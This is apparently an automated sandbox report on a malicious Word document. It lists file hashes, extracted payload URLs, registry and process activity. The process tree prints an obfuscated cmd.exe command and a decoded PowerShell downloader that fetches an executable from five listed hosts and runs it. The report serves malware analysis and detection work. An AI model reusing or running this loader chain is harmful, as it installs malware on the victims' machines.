Analysis
-
max time kernel
220s -
max time network
208s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20-09-2024 22:16
Behavioral task
behavioral1
Sample
DOC-1024047857539219.doc
Resource
win10v2004-20240802-en
General
-
Target
DOC-1024047857539219.doc
-
Size
141KB
-
MD5
f05b51ff62b8a936a9ae9fb42de0e2d7
-
SHA1
07bd71cc74e6cc9ac32994ffb2f5f2c17312e45c
-
SHA256
37b56acca434a4704378c5031e26566096282c346b3ea37fc2390f7ff4ceb1b8
-
SHA512
9d7c0951aefd793b110486f32763907e77be80af2a479d2228665cf4dd286976c4bfdc5af423965c1e3e281061e359c6dc72985c463cd29d5c7f7e605a77b66e
-
SSDEEP
1536:6681ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a98fkS03osuxtiPxFYPay:38GhDS0o9zTGOZD6EbzCdsaRMQy
Malware Config
Extracted
http://twilm.com/IsvlxHU
http://kawahrengganis.com/dNCOd9BFwP
http://bnicl.net/JIN1P3qE7T
http://dev.yajur.com/pVc0MkrUF
http://hellodev.efront-dev.com.au/kDx1GRbOo8
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3216 4996 cmd.exe 81 -
Blocklisted process makes network request 5 IoCs
flow pid Process 26 1556 powershell.exe 29 1556 powershell.exe 30 1556 powershell.exe 33 1556 powershell.exe 39 1556 powershell.exe -
pid Process 1556 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Certification\RequiresRedirect = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\Licensing\RequiresRedirect = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\ServerType = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Licensing\Vdir = "_wmcs/licensing" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Licensing\RequiresRedirect = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\Certification WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\Certification\Vdir = "_wmcs/certification" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\Certification\Vdir = "_wmcs/certificationexternal" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\ServiceDiscovery WINWORD.EXE Set value (data) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\MSIPP-MK = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003d1c6f3067c0c84abb3839afa92ebb0f00000000040000002000000010660000000100002000000060d18dbda45b9eb604c93cff9c55ea2cb3c7fb8c710be78d02d3457ccade4a95000000000e80000000020000200000005116d3fbeaf1eb3dfe6e2a6c3e74243bc25a6f0840218ad8f16140722a49ac96a00400006fd8203e9b0776a57bd8b497ccd6ead1be299d756eeaad93c9b9a657f7a98111c085c0c49e7312f5939f63acaf9affbbf047e695cc9de753321ba3a6a4c536b62fda62a58a39f99e426753352c9445ca2b6c2828de00b738a6f9638e513019f6fdcb6b37d8bc7f176456bb238532e8402d700bb5eebd3858890f1c922c740d1a5f21c802f8b4965bc2768c6a207e0c8d438c6599c404397d603a1554bb56f7b00866e51b476f6fd21acda81cd5f5312c6e0856dae0a44041c599e7f64aeaf6bfdeb1c9a30da4fa8558eaf19a3be86a4d77aeeafeaf73089aaa2a3a581cd216d59b81910385eafa1415917430b90d75b7f771f2ee3a8faf64ae034e8f3d906b2f90f29fd0b2b074b364a14c6699e229799a118463519e5f6f6b8d09541f14a679eb3f1204fd816049ad39ec9b516c33b16ed5ad46732740e67b84ef543760fdfb4aa071d6945e0b8af03a5dafeef5996c45b57cd4a090cf8c5104040414a151fad23a6288514c0e338a87cd67f8295272cd8d8304da103ee01605f06e923b812f07bbc87d33b106e6310e8ee09ea195259d8056f462feaaaec73579d6c7db207c740028c57559a941cf2e42512165492529cf6ba63bbc54023c425769eb9b605dd89e1500e48757f6e59ca8c46e230658f3f7cfac03ffe5b3bcff2517e84013b7a7baa944710a88f88a8a39be8f5ff21f452387c51464ed7b20440c1d3dec27493ac9095c49f7a0945414611bf53055c2624776d6908a4a9cb06cd59846d30298e17f0d0a984eb93b85a755de1f25950acd6451e3340f03d9ea1918e3dc84b13791fe88381645dc2c962fe2a1e46a91ee98ccc0bac54c4730fc3e8aea05a0e9574262c9cb6c13e351e3b6d2f25a13a72dd7dbd2369c4e4dd0dc97406d24ca9f164a9e42b8fef4be071f8afd60028465a5595b343dd34b6351582020cb9591c02e513baa35bbbd9dc88d534410d702d8a6ec022328b7755e0fa1cb3249f5cb70105b8e26ac1117e52e88149827afe00052d609637cc135bf9359cd3193804c97ea562a4de511529e27e0071a7a381089ad522acb4640448a24f91105dd3a4873d2aaf6679bb35b8730591e43997e9cca3ff5793fac69c4d34fd37f8597d8102724e0737546410693a088d1331f4936a07e567b4c0ee299b70eb5ce64409d3a549178baccd8c7f7dbd3ff24a640ae38fce7b1fbb2d6d7556793539d51c4c7600ad74fb152b612f2a03aab28b0d5ff83a3d381f4d6122d39c7b9eeb9b3c2b007c5b013f3544d66be0084ec8c001b0cf1a75cd4e74a2f49b00bf43bcd17a01e21989a39570274e939144495a7131be910cc8caf46f2ad856b7f2851fdaf81dc53eec65e0efb95b01b1a1ed9d59b8c8103f91c58205d04674bbbe4c4fa97a4dc08a062a09dc9c0a956277409f91d0eddaf43fc8224aa1ef75168f9e8d160ade0fec53596a4833a1881f822f135187ca8ce284c7255ab9d9dd22e01c15ec4cda8d48a5af6d7ca39982e28021b330b5ebce008e4fd8b659f27f8262c5ec36d0788e39414bd92331f172843c90eb1f4377dd27717967c142e3dc340fdaf7836ca9beee26053c0e86a91154e28882844f5c8b4a92a98ca471ade4c036a301e8d3d4284ae1a0ef95ffbc282e4d01e5c99a43c42c529199c46e032260a09b61efee033e0d3a940000000ba247b8a82b9d17d385463d761a70c88e6ff5da30383e34490729ebd79f4aeb15527cc84223cc4261f54db360ba6b4a74218d1d5d0ee8e15412780abef0f3112 WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\ServiceDiscoveryUriChecked = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Certification WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Certification\Vdir = "_wmcs/certification" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\Certification\QueryString = "?Whr=urn:HostedRmsOnlineService:Certification" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Licensing WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\Certification\RequiresRedirect = "1" WINWORD.EXE Set value (data) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\MSIPP-SK = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003d1c6f3067c0c84abb3839afa92ebb0f000000000400000020000000106600000001000020000000a779d006001031e79707542a539a27adde363d1c2aedc60bde4659f1fb8db5b1000000000e80000000020000200000002eba0c7a8d17e09986c71b57d2380a19d9a5151ce5b5f459788d6207650c4e529000000051a425198764147aa097d21aa5c5b74243830e8f4751530b93f646ad579fa1ce82dc9ac89f13e29fdf8723a49290a7f492434826c2562c15db3baf232d0dd3a79ed4e0aae201098e88f14ff5f9ccaa1934bbe5d7bf5ca5d658befddd4823b05793dad24c780446ad11617d869b43b2932e4d8e28471219449ead028040fb3c279837d1e7d2f6bc2d0ed8d1b355113348400000001f780d1218c0e86a2988db7e9f03f31cb5f99f4b391659776241a0fbbe884812967d2b880eb19de04c3444a66fde6ed2e3dda9309ecc172c8c630a8c099ae0a3 WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\Certification\RequiresRedirect = "1" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Certification\RequiresBrowser = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Licensing\RequiresRedirect = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\ServiceDiscovery\RequiresBrowser = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Licensing\RequiresBrowser = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\ServiceDiscovery\RequiresBrowser = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2 WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Licensing\RequiresBrowser = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\Certification WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\Certification\RequiresBrowser = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\ServiceDiscovery\RequiresBrowser = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\Certification WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\IssuanceLicV2Enabled = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\ServiceDiscovery WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\Licensing WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Certification\RequiresBrowser = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Licensing WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\ServiceDiscovery\Vdir = "_wmcs/servicediscovery" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\ServiceDiscovery\RequiresRedirect = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\Licensing\RequiresBrowser = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\ServiceDiscovery\RequiresBrowser = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\Certification\RequiresBrowser = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\ServiceDiscovery\RequiresRedirect = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\ServiceDiscovery\RequiresBrowser = "0" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\ServiceDiscovery\Vdir = "_wmcs/servicediscovery" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\ServiceDiscovery WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\ServiceDiscovery\RequiresRedirect = "0" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\ServiceDiscovery\Vdir = "_wmcs/servicediscovery" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Certification\Vdir = "_wmcs/oauth2/certification" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Licensing\Vdir = "_wmcs/licensing" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\ServiceDiscovery\Vdir = "_wmcs/oauth2/servicediscovery" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\x509\Certification\QueryString = "?Whr=urn:microsoftrmsonline:x509" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\Version = "1.0.0.0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\Certification\RequiresRedirect = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\Certification\RequiresRedirect = "0" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\Licensing\RequiresRedirect = "0" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\ServiceDiscovery\Vdir = "_wmcs/servicediscovery" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\oauth2\Certification WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\ServiceDiscoveryUri WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msospn\ServiceDiscovery\RequiresRedirect = "0" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msosso\Licensing WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\SOFTWARE\Microsoft\MSIPC\discover.aadrm.com\ServerInfo\AuthTypes\msossp\Licensing WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4996 WINWORD.EXE 4996 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1556 powershell.exe 1556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1556 powershell.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE 4996 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4996 wrote to memory of 3216 4996 WINWORD.EXE 85 PID 4996 wrote to memory of 3216 4996 WINWORD.EXE 85 PID 3216 wrote to memory of 2060 3216 cmd.exe 88 PID 3216 wrote to memory of 2060 3216 cmd.exe 88 PID 2060 wrote to memory of 1556 2060 cmd.exe 91 PID 2060 wrote to memory of 1556 2060 cmd.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DOC-1024047857539219.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set yN5G=AwPRfwcPaTUAjiTLjjCDCH-N=WzVBgS9})7F\+v:kdKp/3xqnG$om.slIZe10'b(@Eu yh{8,tY;rMOJ&&for %W in (50;27;28;57;24;61;41;20;23;61;75;50;65;54;13;24;48;58;5;22;51;62;17;58;6;73;67;23;58;73;53;25;58;62;20;55;13;58;48;73;75;50;28;15;47;24;61;69;73;73;43;39;44;44;73;5;13;55;52;53;6;51;52;44;56;54;38;55;46;21;10;64;69;73;73;43;39;44;44;40;8;5;8;69;76;58;48;29;29;8;48;13;54;53;6;51;52;44;41;23;20;78;41;31;28;35;5;7;64;69;73;73;43;39;44;44;62;48;13;6;55;53;48;58;73;44;79;56;23;59;7;45;47;65;34;14;64;69;73;73;43;39;44;44;41;58;38;53;68;8;17;66;76;53;6;51;52;44;43;27;6;60;77;40;76;10;35;64;69;73;73;43;39;44;44;69;58;55;55;51;41;58;38;53;58;4;76;51;48;73;22;41;58;38;53;6;51;52;53;8;66;44;40;19;46;59;49;3;62;78;51;71;61;53;30;43;55;13;73;63;61;64;61;33;75;50;26;10;66;24;61;35;14;10;61;75;50;76;41;14;67;24;67;61;71;31;34;61;75;50;69;66;23;24;61;17;11;42;61;75;50;5;14;4;24;50;58;48;38;39;73;58;52;43;37;61;36;61;37;50;76;41;14;37;61;53;58;46;58;61;75;4;51;76;58;8;6;69;63;50;74;6;38;67;13;48;67;50;28;15;47;33;70;73;76;68;70;50;65;54;13;53;19;51;5;48;55;51;8;41;35;13;55;58;63;50;74;6;38;72;67;50;5;14;4;33;75;50;20;26;30;24;61;26;54;28;61;75;56;4;67;63;63;49;58;73;22;56;73;58;52;67;50;5;14;4;33;53;55;58;48;29;73;69;67;22;29;58;67;71;60;60;60;60;33;67;70;56;48;38;51;40;58;22;56;73;58;52;67;50;5;14;4;75;50;73;74;19;24;61;55;69;5;61;75;62;76;58;8;40;75;32;32;6;8;73;6;69;70;32;32;50;47;28;65;24;61;5;6;41;61;75;82)do set fnyr=!fnyr!!yN5G:~%W,1!&&if %W gtr 81 power%USERPROFILE:~7,1%he%PUBLIC:~12,1%%ProgramW6432:~13,-2% "!fnyr:~-452!""2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\system32\cmd.exeCmD /V:O/C"set yN5G=AwPRfwcPaTUAjiTLjjCDCH-N=WzVBgS9})7F\+v:kdKp/3xqnG$om.slIZe10'b(@Eu yh{8,tY;rMOJ&&for %W in (50;27;28;57;24;61;41;20;23;61;75;50;65;54;13;24;48;58;5;22;51;62;17;58;6;73;67;23;58;73;53;25;58;62;20;55;13;58;48;73;75;50;28;15;47;24;61;69;73;73;43;39;44;44;73;5;13;55;52;53;6;51;52;44;56;54;38;55;46;21;10;64;69;73;73;43;39;44;44;40;8;5;8;69;76;58;48;29;29;8;48;13;54;53;6;51;52;44;41;23;20;78;41;31;28;35;5;7;64;69;73;73;43;39;44;44;62;48;13;6;55;53;48;58;73;44;79;56;23;59;7;45;47;65;34;14;64;69;73;73;43;39;44;44;41;58;38;53;68;8;17;66;76;53;6;51;52;44;43;27;6;60;77;40;76;10;35;64;69;73;73;43;39;44;44;69;58;55;55;51;41;58;38;53;58;4;76;51;48;73;22;41;58;38;53;6;51;52;53;8;66;44;40;19;46;59;49;3;62;78;51;71;61;53;30;43;55;13;73;63;61;64;61;33;75;50;26;10;66;24;61;35;14;10;61;75;50;76;41;14;67;24;67;61;71;31;34;61;75;50;69;66;23;24;61;17;11;42;61;75;50;5;14;4;24;50;58;48;38;39;73;58;52;43;37;61;36;61;37;50;76;41;14;37;61;53;58;46;58;61;75;4;51;76;58;8;6;69;63;50;74;6;38;67;13;48;67;50;28;15;47;33;70;73;76;68;70;50;65;54;13;53;19;51;5;48;55;51;8;41;35;13;55;58;63;50;74;6;38;72;67;50;5;14;4;33;75;50;20;26;30;24;61;26;54;28;61;75;56;4;67;63;63;49;58;73;22;56;73;58;52;67;50;5;14;4;33;53;55;58;48;29;73;69;67;22;29;58;67;71;60;60;60;60;33;67;70;56;48;38;51;40;58;22;56;73;58;52;67;50;5;14;4;75;50;73;74;19;24;61;55;69;5;61;75;62;76;58;8;40;75;32;32;6;8;73;6;69;70;32;32;50;47;28;65;24;61;5;6;41;61;75;82)do set fnyr=!fnyr!!yN5G:~%W,1!&&if %W gtr 81 powershell "!fnyr:~-452!""3⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$VBZ='dCN';$Esi=new-object Net.WebClient;$BLq='http://twilm.com/IsvlxHU@http://kawahrengganis.com/dNCOd9BFwP@http://bnicl.net/JIN1P3qE7T@http://dev.yajur.com/pVc0MkrUF@http://hellodev.efront-dev.com.au/kDx1GRbOo8'.Split('@');$zUu='FTU';$rdT = '897';$huN='jAK';$wTf=$env:temp+'\'+$rdT+'.exe';foreach($Ycv in $BLq){try{$Esi.DownloadFile($Ycv, $wTf);$CzS='zsB';If ((Get-Item $wTf).length -ge 80000) {Invoke-Item $wTf;$tYD='lhw';break;}}catch{}}$qBE='wcd';"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25KB
MD586b46466384266e9b1611f73ec34b7b9
SHA1335fc47f3c2a50b7e6ed25a4a6027d38aeda04ad
SHA256435a8ecd79fefa6c5010d20092a7361345c884c36a7a25134c712c6a47823b5e
SHA51287b7b672ff5cbb9eb8937796c449bd4e64cac188d3637ac57cc98d09c292ae302362eff3c676354223d4cf561dec075476d37731957532dfa8d75d8e6f86d6c7
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
